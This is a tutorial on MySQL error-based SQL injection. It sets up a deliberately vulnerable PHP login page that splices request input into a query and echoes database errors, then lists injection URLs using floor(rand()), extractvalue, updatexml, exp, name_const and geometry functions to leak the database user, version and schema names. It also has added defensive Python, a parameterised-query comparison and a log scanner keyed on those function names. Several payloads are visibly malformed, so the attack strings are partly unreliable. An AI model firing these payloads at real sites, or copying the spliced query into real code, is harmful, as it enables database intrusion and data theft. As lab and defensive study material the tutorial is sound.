Principle of error-based injection: because rand() conflicts with GROUP BY, rand() can be used neither as an ORDER BY field nor as a GROUP BY field. floor(rand(0) * *) produces an indeterminate, repeating value, which makes MySQL raise an error. floor(): rounds down, keeping only the integer part. rand(0): a value in the range 0~1.

Set up the database locally and test the injection:
```sql
mysql> CREATE DATABASE sqli;
-- The column lengths were lost in extraction of the original; the values below are assumed.
-- pass holds an MD5 hex digest, which is always 32 characters.
mysql> CREATE TABLE user (
           id   int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,
           name varchar(32) NOT NULL,
           pass varchar(32) NOT NULL
       );
mysql> INSERT INTO user (name, pass) VALUES ('admin', MD5('admin888')), ('guest', MD5('guest'));
```
Create the following file in the site root: index.php
```php
<?php
$conn = mysql_connect("localhost", "root", "root"); // connect to the database, account root, password root
if (!$conn) {
    die("Connection failed: " . mysql_error());
}
mysql_select_db("sqli", $conn);

// verify login info
if (isset($_GET['name']) && isset($_GET['pass'])) {
    $name  = $_GET['name'];
    $pass  = md5($_GET['pass']);
    // user input is spliced directly into the SQL text (the injection point)
    $query = "SELECT * FROM user WHERE name='$name' AND pass='$pass'";
    if ($result = mysql_query($query, $conn)) {
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        if ($row) {
            echo "<script>alert('Login successful!');</script>";
        }
    } else {
        // the raw MySQL error is echoed to the client; this is what error-based injection reads
        die("Operation error: " . mysql_error());
    }
}
mysql_close();
?>
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
</head>
<body>
<center>
    <form method="get" action="">
        <label>Username:</label><input type="text" name="name" value=""/><br/>
        <label>Password:</label><input type="password" name="pass" value=""/><br/>
        <input type="submit" value="Login"/>
    </form>
</center>
</body>
</html>
```
The PHP login check in index.php is simple:

```php
$name  = $_GET['name'];
$pass  = md5($_GET['pass']);
$query = "SELECT * FROM user WHERE name='$name' AND pass='$pass'";
```

The $name parameter is an obvious injection point.
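To make the injection point concrete from the defender's side, here is an added example (not code from the original post) that writes the same login check two ways: once by splicing the name into the SQL text exactly as index.php does, and once with a parameterised query. It uses an in-memory SQLite table standing in for the page's MySQL "user" table so that it runs offline; the sample rows, the `O'Brien` input and all function names are constructed for this example.

```python
import hashlib
import sqlite3


def md5_hex(password: str) -> str:
    # index.php hashes the password with MD5 before the lookup; mirrored here.
    return hashlib.md5(password.encode()).hexdigest()


def make_test_db() -> sqlite3.Connection:
    # Constructed sample rows matching the page's INSERT (SQLite stands in for MySQL).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT NOT NULL, pass TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO user (name, pass) VALUES (?, ?)",
        [("admin", md5_hex("admin888")), ("guest", md5_hex("guest"))],
    )
    return conn


def build_query_unsafe(name: str, password: str) -> str:
    # Same construction as index.php: the request value is spliced into the SQL text,
    # so a single quote in `name` closes the literal and whatever follows is parsed as SQL.
    return f"SELECT * FROM user WHERE name='{name}' AND pass='{md5_hex(password)}'"


def run_unsafe(conn: sqlite3.Connection, name: str, password: str):
    # Executes the spliced query and reports what the client would see. index.php prints
    # mysql_error() on failure, and that error text is the channel error-based injection reads.
    try:
        return ("ok", conn.execute(build_query_unsafe(name, password)).fetchone())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def login_safe(conn: sqlite3.Connection, name: str, password: str):
    # Parameterised query: values travel separately from the SQL text, so quotes in `name`
    # stay data. Any database failure is swallowed into a generic "no match" for the client.
    try:
        return conn.execute(
            "SELECT id, name FROM user WHERE name = ? AND pass = ?",
            (name, md5_hex(password)),
        ).fetchone()
    except sqlite3.Error:
        return None


if __name__ == "__main__":
    db = make_test_db()
    # A legitimate name containing an apostrophe already breaks the spliced query
    # and surfaces a driver error; the parameterised version simply finds no row.
    print(build_query_unsafe("O'Brien", "pw"))
    print(run_unsafe(db, "O'Brien", "pw"))
    print(login_safe(db, "O'Brien", "pw"))
    print(login_safe(db, "admin", "admin888"))
```

Running it shows that a harmless apostrophe is enough to turn the spliced query into a database error, which index.php would echo verbatim; the parameterised query treats the same input as an ordinary string and returns nothing. Binding parameters plus suppressing driver error text removes both halves of what the techniques below rely on.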
1. Via floor() error:

http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)))x+from+information_schema.tables+group+by+x)a)+%23&pass=1
# Dump database names: replace the keyword with the one you want to query

http://localhost/index.php?name='+or+(select 1 from (select count(*), concat((select (select distinct concat(0x7e,schema_name,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*) x from information_schema.tables group by x) a)+%23&pass=1
2. Via extractvalue() error:

http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1
3. Via updatexml() error:

http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1
4. Via exp() error. For details see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/

http://localhost/index.php?name='+or+exp(~(SELECT * FROM (select user()) a)+%23&pass=1
5. Via name_const() error (for lower versions):

http://localhost/index.php?name='+or+(SELECT * FROM (select name_const(version(),1), name_const(version(),1)) as x)+%23&pass=1
6. Via multipoint(), multipolygon(), multilinestring(), linestring(), geometrycollection(), polygon() and similar functions:

http://localhost/index.php?name='+or+multipoint((SELECT * FROM (SELECT * () () a) b)+%23&pass=1
http://localhost/index.php?name='+or+multipolygon((select * from(select * from(select database()) a) (b))+%23&pass=1
http://localhost/index.php?name='+or+multilinestring((SELECT * FROM (select user() a) b))+%23&pass=1
http://localhost/index.php?name='+or+linestring((select * from(select * from(select user()) a) (b))+%23&pass=1
http://localhost/index.php?name='+or+geometrycollection((SELECT * FROM (SELECT * () () a) b)+%23&pass=1
http://localhost/index.php?name='+or+polygon((select * from(select * from(select user()) a) (b))+%23&pass=1
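All six techniques above share one trait a defender can key on: the query string carries a MySQL function that exists only to make the server throw. The following added example (not code from the original post) scans web-server access log lines for those function names after URL-decoding the request target, covering every technique listed on this page. The log lines are constructed for the example and follow the Apache combined format; the regular expression and function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Function names taken from the page's list of error-triggering techniques.
ERROR_FUNCS = (
    "floor(rand(", "extractvalue(", "updatexml(", "exp(~", "name_const(",
    "multipoint(", "multipolygon(", "multilinestring(", "linestring(",
    "geometrycollection(", "polygon(",
)

# Request target from a combined-format log line, e.g. "GET /index.php?... HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic). Lines 2, 3 and 5 carry requests in
# the shape shown on the page; lines 1 and 4 are benign, line 4 deliberately using
# function names as plain values without a call.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?name=admin&pass=admin888 HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?name=%27+or+updatexml(1%2Cconcat(user()%2C0x7e%2Cversion())%2C1)+%23&pass=1 HTTP/1.1" 200 698',
    '127.0.0.1 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?name=%27+or+ExtractValue(1%2C+concat(user()%2C0x7e%2Cversion()))+%23&pass=1 HTTP/1.1" 200 690',
    '127.0.0.1 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?name=polygon&pass=linestring HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:13:55:58 +0000] "GET /index.php?name=%27+or+(select+1+from(select+count(*)%2Cconcat(user()%2C0x7e%2Cfloor(rand(0)))x+from+information_schema.tables+group+by+x)a)+%23&pass=1 HTTP/1.1" 200 704',
]


def normalize(target: str) -> str:
    # Decode twice so double-encoded payloads are seen, then lower-case and strip all
    # whitespace so that "floor (rand (0)" and "FLOOR(RAND(0)" compare equal.
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", "", decoded.lower())


def error_funcs_in(target: str) -> list:
    # Names of error-triggering functions called anywhere in the request target.
    norm = normalize(target)
    return [f for f in ERROR_FUNCS if f in norm]


def scan_log(lines) -> list:
    # Returns (1-based line number, matched functions) for each suspicious request.
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        funcs = error_funcs_in(m.group(1))
        if funcs:
            hits.append((n, funcs))
    return hits


if __name__ == "__main__":
    for line_no, funcs in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(funcs)}")
```

Matching on the decoded, whitespace-stripped call name rather than on raw text avoids misses from `+`, `%20` or double encoding, and requiring the opening parenthesis keeps ordinary values such as a username of `polygon` from alerting. In production the same check belongs in a WAF rule or a SIEM query, and a match on a page that then returned a 200 with a body containing the database version string is the pairing worth paging on.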